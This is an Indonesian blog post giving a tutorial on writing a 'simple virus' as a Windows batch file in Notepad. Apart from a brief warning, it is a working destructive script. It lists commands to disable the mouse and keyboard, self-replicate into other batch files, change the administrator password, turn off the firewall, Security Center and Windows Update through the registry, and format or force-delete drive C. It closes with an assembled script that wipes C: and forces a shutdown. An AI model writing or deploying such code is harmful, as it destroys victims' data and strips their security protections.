Archives

Minggu, 12 Februari 2012

Cara membuat virus sederhana dengan NOTEPAD


Saya tidak menyarankan anda utk menjalankan virus ini dikomputer sendiri!!

Virus ini dibuat dg Notepad dan di save as dg ekstension .bat
Jgn lupa utk merubah Save as type menjadi All files


BASIC

invisible command

@echo off
Swap mouse

rundll32 user,swapmousebutton
buka URL yg diinginkan

start [url]http://www.google.com[/url]
Shutdown kmptr & beri pesan

shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse stlh Restart

rundll32 mouse,disable
Disable keyboard stlh Restart

rundll32 keyboard,disable
Freezes kmptr stlh Restart

rundll32 user,disableoemlayer

Worm

memperbanyak diri didlm direktori

ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
me-replace file batch yg lain

%0 >>other.bat

Trojan

mngirim dftar file dlm direktori

dir *.*>>Filelist.txt
ganti password admin

net user administrator PASSWORD HERE
membuat info IP

ipconfig >Computer-IP-address.txt

Perusak

copy ke Autorun

COPY %0 %windir%WINSTART.BAT
format drive C

format c: /q /autotest
delete Windows

DELTREE /Y %windir%
delete drive C dg paksa

DEL /F /S /Q C:
mematikan firewall & security center

net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0

Pause

pause smpai tekan smbarang tombol

pause
pause 20 detik

@ping.exe 127.0.0.1 -n 20 -w 1000 > nul

Berikut hasil akhirnya :

@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start [url]http://www.youtube.com[/url]
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
-disables mouse & keyboard
-copy ke AUTORUN
-stop Security Center
-display "Anda kena VIRUS!!!" selama 5 detik
-starts [url]http://www.youtube.com[/url]
-disable firewall
-delete c: drive
-force shutdown dg pesan "Ucapkan selamat tinggal pada komputermu!"

8 komentar: